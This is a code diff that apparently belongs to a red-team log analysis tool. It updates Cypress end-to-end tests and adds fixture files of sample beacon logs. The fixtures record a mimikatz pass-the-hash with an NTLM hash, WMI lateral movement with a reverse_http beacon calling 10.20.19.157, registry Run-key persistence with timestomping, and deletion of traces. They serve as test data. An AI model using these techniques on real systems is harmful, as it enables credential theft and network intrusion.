diff --git a/applications/redeye-e2e/cypress.config.js b/applications/redeye-e2e/cypress.config.js index 13088306..48b3c2b9 100644 --- a/applications/redeye-e2e/cypress.config.js +++ b/applications/redeye-e2e/cypress.config.js @@ -3,11 +3,10 @@ const { defineConfig } = require('cypress'); module.exports = defineConfig({ fixturesFolder: './src/fixtures', modifyObstructiveCode: false, - video: false, + videoUploadOnPasses: false, videosFolder: '../../dist/applications/redeye-e2e/videos', screenshotsFolder: '../../dist/applications/redeye-e2e/screenshots', failOnStatusCode: false, - experimentalWebKitSupport: true, viewportWidth: 1920, viewportHeight: 1080, reporter: '../../node_modules/cypress-multi-reporters', @@ -19,7 +18,6 @@ module.exports = defineConfig({ }, e2e: { setupNodeEvents(on, config) {}, - experimentalSessionAndOrigin: true, specPattern: '../../**/*.cy.js', supportFile: './src/support/index.js', excludeSpecPattern: '*.skip.js', diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log new file mode 100644 index 00000000..96ceef69 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log @@ -0,0 +1,67 @@ +10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64) +10/13 16:28:23 UTC [input] rev2self +10/13 16:28:23 UTC [task] Tasked beacon to revert token +10/13 16:28:23 UTC [input] pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1 +10/13 16:28:23 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command +10/13 16:28:23 UTC [input] jump lateral 192.168.3.71 demo +10/13 16:28:23 UTC [task] Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans +10/13 16:28:25 UTC [task] Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71 +10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes +10/13 16:28:32 UTC [output] +Impersonated EXAMPLE\allison_powell + +10/13 16:28:32 UTC [output] +received output: +user : PRESTON_SMITH +domain : EXAMPLE +program : C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777 +impers. : no +NTLM : 5dd210785947abcb14a0d855fa90a5e1 + | PID 2936 + | TID 3708 + | LSA Process is now R/W + | LUID 0 ; 51448631 (00000000:03110b37) + \_ msv1_0 - data copy @ 000001693C6D5F70 : OK ! + \_ kerberos - data copy @ 000001693CE45E68 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 000001693CE556C8 (32) -> null + + +10/13 16:28:32 UTC [output] +received output: + +Starting lateral movement using wmi to 192.168.3.71 +Writing \\192.168.3.71\C$\Windows\winproc.exe + + +10/13 16:29:32 UTC [output] +received output: +Creating event filter +Creating event consumer +Binding filter and consumer + +Waiting for trigger + + + +10/13 16:30:32 UTC [output] +received output: + +Event Filters: +Removed filter + +Event Consumers: +Removed filter + +Bindings: +Removed binding +Covering tracks +Deleted \\192.168.3.71\C$\Windows\winproc.exe + + diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log new file mode 100644 index 00000000..5093714c --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log @@ -0,0 +1 @@ +10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64) diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log new file mode 100644 index 00000000..02e3cd91 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log @@ -0,0 +1,3 @@ +10/13 16:26:18 UTC *** analyst01 joined +10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001) +10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004) diff --git a/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log new file mode 100644 index 00000000..1ef9301e --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log @@ -0,0 +1,12 @@ +10/23 18:51:22 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64) +10/23 18:52:13 UTC [input] execute-assembly /home/analyst01/payloads/Persistance.exe -c +10/23 18:52:13 UTC [task] Tasked beacon to run .NET program: Persistance.exe -c +10/23 18:53:13 UTC [checkin] host called home, sent: 125507 bytes +10/23 18:53:14 UTC [output] +received output: + +Registry HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Values: + +Persistance not found + + diff --git a/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log new file mode 100644 index 00000000..5b26db70 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log @@ -0,0 +1,2 @@ +10/23 18:50:45 UTC *** analyst01 joined +10/23 18:51:13 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001) diff --git a/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log new file mode 100644 index 00000000..db26cd4d --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log @@ -0,0 +1,13 @@ +10/23 19:09:32 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64) +10/23 19:10:43 UTC [input] jump user_persist COMPUTER001 demo +10/23 19:10:43 UTC [task] Tasked Beacon to jump to COMPUTER001 (windows/beacon_http/reverse_http (10.20.19.157:80)) via registry persistance +10/23 19:10:44 UTC [task] Tasked beacon to run .NET program: persist.exe -a +10/23 19:11:29 UTC [checkin] host called home, sent: 411201 bytes +10/23 19:11:29 UTC [output] +received output: +Writing C:\Windows\Tasks\systemupdate.exe +Setting file timestamp to 2/6/2013 7:27:27 PM +Adding registry value name: SystemUpdateServices +Adding registry value data: C:\Windows\Tasks\systemupdate.exe + + diff --git a/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log new file mode 100644 index 00000000..d00cdf72 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log @@ -0,0 +1,2 @@ +10/23 19:09:28 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001) +10/23 19:09:30 UTC *** analyst01 joined diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log new file mode 100644 index 00000000..fb38c9b0 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log @@ -0,0 +1,73 @@ +10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64) +10/13 16:28:23 UTC [input] rev2self +10/13 16:28:23 UTC [task] Tasked beacon to revert token +10/13 16:28:23 UTC [input] pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1 +10/13 16:28:23 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command +10/13 16:28:23 UTC [input] jump lateral 192.168.3.71 demo +10/13 16:28:23 UTC [task] Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans +10/13 16:28:25 UTC [task] Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71 +10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes +10/13 16:28:32 UTC [output] +Impersonated EXAMPLE\allison_powell + +10/13 16:28:32 UTC [output] +received output: +user : PRESTON_SMITH +domain : EXAMPLE +program : C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777 +impers. : no +NTLM : 5dd210785947abcb14a0d855fa90a5e1 + | PID 2936 + | TID 3708 + | LSA Process is now R/W + | LUID 0 ; 51448631 (00000000:03110b37) + \_ msv1_0 - data copy @ 000001693C6D5F70 : OK ! + \_ kerberos - data copy @ 000001693CE45E68 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 000001693CE556C8 (32) -> null + + +10/13 16:28:32 UTC [output] +received output: + +Starting lateral movement using wmi to 192.168.3.71 +Writing \\192.168.3.71\C$\Windows\winproc.exe + + +10/13 16:29:32 UTC [output] +received output: +Creating event filter +Creating event consumer +Binding filter and consumer + +Waiting for trigger + + + +10/13 16:30:32 UTC [output] +received output: + +Event Filters: +Removed filter + +Event Consumers: +Removed filter + +Bindings: +Removed binding +Covering tracks +Deleted \\192.168.3.71\C$\Windows\winproc.exe + + +10/13 17:39:31 UTC [input] exit +10/13 17:39:31 UTC [task] <> Tasked beacon to exit +10/13 17:39:34 UTC [checkin] host called home, sent: 8 bytes +10/13 17:39:34 UTC [output] +beacon exit. + diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log new file mode 100644 index 00000000..a1d4a5f7 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log @@ -0,0 +1,7 @@ +10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64) +10/13 17:39:27 UTC [input] exit +10/13 17:39:27 UTC [task] <> Tasked beacon to exit +10/13 17:40:25 UTC [checkin] host called home, sent: 8 bytes +10/13 17:40:25 UTC [output] +beacon exit. + diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log new file mode 100644 index 00000000..a3646e78 --- /dev/null +++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log @@ -0,0 +1,4 @@ +10/13 16:26:18 UTC *** analyst01 joined +10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001) +10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004) +10/13 17:40:41 UTC *** analyst01 quit diff --git a/applications/redeye-e2e/src/integration/e2e/beacon-count.skip.js b/applications/redeye-e2e/src/integration/e2e/redteam/beacon-count.skip.js similarity index 100% rename from applications/redeye-e2e/src/integration/e2e/beacon-count.skip.js rename to applications/redeye-e2e/src/integration/e2e/redteam/beacon-count.skip.js diff --git a/applications/redeye-e2e/src/integration/e2e/command-count.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js similarity index 98% rename from applications/redeye-e2e/src/integration/e2e/command-count.cy.js rename to applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js index 770b14a3..83321d2a 100644 --- a/applications/redeye-e2e/src/integration/e2e/command-count.cy.js +++ b/applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js @@ -1,6 +1,6 @@ /// -import { graphqlRequest } from '../../support/utils'; +import { graphqlRequest } from '../../../support/utils.js'; describe('Command counts', () => { const camp = 'commandcounts'; diff --git a/applications/redeye-e2e/src/integration/e2e/search-result-count.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/search-result-count.cy.js similarity index 100% rename from applications/redeye-e2e/src/integration/e2e/search-result-count.cy.js rename to applications/redeye-e2e/src/integration/e2e/redteam/search-result-count.cy.js diff --git a/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js new file mode 100644 index 00000000..44062c18 --- /dev/null +++ b/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js @@ -0,0 +1,25 @@ +/// + +describe('Timeline tests', () => { + const camp = '200817'; + + it('Verify timeline features', () => { + cy.get('[cy-test=add-campaign-btn]').click(); + + cy.uploadLogs('seb', camp); + + cy.wait(500); + + cy.get('[cy-test=close-log]').click(); + + cy.reload(); + + cy.get('[cy-test=beacon-count]').invoke('text').should('contain', '4'); + + cy.get('[cy-test=command-count]').invoke('text').should('contain', '7'); + }); + + after(() => { + cy.deleteCampaignGraphQL(camp); + }); +}); diff --git a/applications/redeye-e2e/src/support/graphqlCommands.js b/applications/redeye-e2e/src/support/graphqlCommands.js index 0bf620e9..7adf03b2 100644 --- a/applications/redeye-e2e/src/support/graphqlCommands.js +++ b/applications/redeye-e2e/src/support/graphqlCommands.js @@ -22,7 +22,7 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => { name } }`; - const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "/Users/angd742/Projects/redeye/applications/redeye-e2e/src/fixtures/TestDataSet/200817"}`; + const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "applications/redeye-e2e/src/fixtures/smalldata"}`; mutRequest(mutation2, variables1).then((res) => { cy.log(res); }); @@ -35,95 +35,14 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => { graphqlRequest(query).then((res) => { cy.log(res); }); - // const mutation1 = ` - // mutation serversParse($campaignId: String!) { - // serversParse(campaignId: $campaignId) - // }`; + const mutation1 = ` + mutation serversParse($campaignId: String!) { + serversParse(campaignId: $campaignId) + }`; - // const variables = `{"campaignId": "${camp}"}`; - // mutRequest(mutation1, variables).then((res) => { - // cy.log(res); - // }); - // }); + const variables = `{"campaignId": "${camp}"}`; + mutRequest(mutation1, variables).then((res) => { + cy.log(res); + }); }); }); - -// Cypress.Commands.add('uploadCampaign1', (creatorName, folderName) => { -// let newId; - -// const mutation = ` -// mutation createCampaign($creatorName: String!, $name: String!) { -// createCampaign(creatorName: $creatorName, name: $name) { -// __typename -// id -// annotationCount -// beaconCount -// bloodStrikeServerCount -// commandCount -// computerCount -// firstLogTime -// lastLogTime -// name -// parsingStatus -// lastOpenedBy { - -// __typename -// id -// id - -// } -// creator { - -// __typename -// id -// id -// } - -// } -// }`; - -// cy -// .request({ -// url: 'http://localhost:4000/api/graphql', -// method: 'POST', -// failOnStatusCode: false, -// body: { query: mutation }, -// }) -// .then(() => { -// const query = `{ -// campaigns { -// id -// name -// } -// }`; -// cy.request({ -// url: 'http://localhost:4000/api/graphql', -// method: 'POST', -// failOnStatusCode: false, -// body: { query }, -// }); -// }) -// .then((response) => { -// let body = response.body.data.campaigns; -// cy.log(body); -// const last = [...body].pop(); -// newId = last['id']; -// cy.log(newId); -// }) -// .then(() => { -// const mutation2 = ` -// mutation { -// addLocalServerFolder(campaignId: ${newId}, fixture: "TestDataSet/${folderName}") -// }`; -// cy -// .request({ -// url: 'http://localhost:4000/api/graphql', -// method: 'POST', -// failOnStatusCode: false, -// body: { query: mutation2 }, -// }) -// .then((res) => { -// cy.log(res); -// }); -// }); -// cy.reload(); diff --git a/package.json b/package.json index cd3d0bef..60161aa4 100644 --- a/package.json +++ b/package.json @@ -156,7 +156,7 @@ "barrelsby": "^2.3.0", "builder-util": "^23.0.2", "cross-env": "^7.0.3", - "cypress": "^11.2.0", + "cypress": "^12.3.0", "cypress-multi-reporters": "^1.6.1", "dotenv": "^8.2.0", "eslint": "^8.22.0", @@ -193,7 +193,6 @@ "nx": "^14.6.3", "pkg": "^5.8.0", "pkg-fetch": "^3.4.2", - "playwright-webkit": "^1.25.2", "prettier": "^2.2.1", "rollup-plugin-auto-external": "^2.0.0", "save-svg-as-png": "^1.4.17", diff --git a/yarn.lock b/yarn.lock index 42170de1..3bbcb2bf 100644 --- a/yarn.lock +++ b/yarn.lock @@ -8325,9 +8325,9 @@ __metadata: languageName: node linkType: hard -"cypress@npm:^11.2.0": - version: 11.2.0 - resolution: "cypress@npm:11.2.0" +"cypress@npm:^12.3.0": + version: 12.3.0 + resolution: "cypress@npm:12.3.0" dependencies: "@cypress/request": ^2.88.10 "@cypress/xvfb": ^1.2.4 @@ -8373,7 +8373,7 @@ __metadata: yauzl: ^2.10.0 bin: cypress: bin/cypress - checksum: e13649fb4b62a3c9dff7cc571f4e01dba009d8179b05c4f885c5ceb4ed76b78a7323fec491d992da35527708b54e596bfc9edb1d702f788317889f794d8c1e76 + checksum: 00658996bcca918254348eb42bc03079ccf2d583e5c9c04190267edcbc542d4a22835d7399711c99f7aa7334412104b23cc5a1aa7f02b8b541c12298bf3f63f0 languageName: node linkType: hard @@ -15739,26 +15739,6 @@ __metadata: languageName: node linkType: hard -"playwright-core@npm:1.25.2": - version: 1.25.2 - resolution: "playwright-core@npm:1.25.2" - bin: - playwright: cli.js - checksum: 24ada61e2132bd7278cf0aa0ef711280e1519c437efa0088a99c47ef994202f4c9880521d8c0c51ab854bef08806f372477d754aac1e790ea64f18cd346b5b2f - languageName: node - linkType: hard - -"playwright-webkit@npm:^1.25.2": - version: 1.25.2 - resolution: "playwright-webkit@npm:1.25.2" - dependencies: - playwright-core: 1.25.2 - bin: - playwright: cli.js - checksum: 0aaf537021e75aed2bc339c2a8a1eb7632885c2da99d21ef8171f4b76454b1ba1b44959c0656d4fa6d5dd79b7532269712a7764528af8d01bcca50747ad10ef6 - languageName: node - linkType: hard - "please-upgrade-node@npm:^3.2.0": version: 3.2.0 resolution: "please-upgrade-node@npm:3.2.0" @@ -17068,7 +17048,7 @@ __metadata: cors: ^2.8.5 cross-env: ^7.0.3 crypto-js: ^4.0.0 - cypress: ^11.2.0 + cypress: ^12.3.0 cypress-multi-reporters: ^1.6.1 d3: ^6.7.0 dotenv: ^8.2.0 @@ -17126,7 +17106,6 @@ __metadata: path-to-regexp: ^6.2.0 pkg: ^5.8.0 pkg-fetch: ^3.4.2 - playwright-webkit: ^1.25.2 prettier: ^2.2.1 react: ^18.2.0 react-dom: ^18.2.0